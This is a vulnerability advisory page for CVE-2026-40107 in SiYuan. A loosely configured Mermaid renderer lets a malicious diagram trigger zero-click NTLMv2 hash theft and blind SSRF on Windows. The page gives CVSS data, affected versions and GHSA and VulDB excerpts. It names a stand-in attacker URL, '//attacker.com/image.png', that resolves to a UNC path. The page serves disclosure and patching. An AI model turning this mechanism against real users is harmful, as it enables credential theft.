CVE-2026-40107
published 2026-04-09CVE-2026-40107: SiYuan is a personal knowledge management system. Prior to 3.6.4, SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode…
PriorityP335medium6.5CVSS 3.1
AVNACLPRNUIRSUCHINAN
EPSS
0.31%
22.2th percentile
SiYuan is a personal knowledge management system. Prior to 3.6.4, SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, tags with src attributes survive Mermaid's internal DOMPurify and land in SVG blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL. On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker. This vulnerability is fixed in 3.6.4.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| b3log | siyuan | < 3.6.4 | 3.6.4 |
| github.com | siyuan-note_siyuan_kernel | >= 0 < 0.0.0-20260407035653-2f416e5253f1 | 0.0.0-20260407035653-2f416e5253f1 |
| siyuan-note | siyuan | < 3.6.4 | 3.6.4 |
CVSS provenance
nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
nvdv4.08.7HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering
ghsa·2026-04-10
CVE-2026-40107 [HIGH] CWE-918 SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering
SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering
SiYuan configures Mermaid.js with `securityLevel: "loose"` and `htmlLabels: true`. In this mode, `` tags with `src` attributes survive Mermaid's internal DOMPurify and land in SVG `` blocks. The SVG is injected via `innerHTML` with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.
On Windows, a protocol-relative URL (`//attacker.com/image.png`) resolves as a UNC path (`\\attacker.com\image.png`). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker.
## Root Cause
Mermaid initialization at `app/src/protyle/render/mermaidRender.ts` lines 28 and 33:
mermaid.initialize({
se
VulDB
SiYuan up to 3.6.3 Mermaid Mermaid.js server-side request forgery (GHSA-w95v-4h65-j455)
vuldb·2026-04-10·CVSS 8.7
CVE-2026-40107 [HIGH] SiYuan up to 3.6.3 Mermaid Mermaid.js server-side request forgery (GHSA-w95v-4h65-j455)
A vulnerability was found in SiYuan up to 3.6.3. It has been declared as critical. This issue affects some unknown processing of the file Mermaid.js of the component Mermaid Handler. The manipulation results in server-side request forgery.
This vulnerability is reported as CVE-2026-40107. The attack can be launched remotely. No exploit exists.
It is recommended to upgrade the affected component.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2026-04-09
Published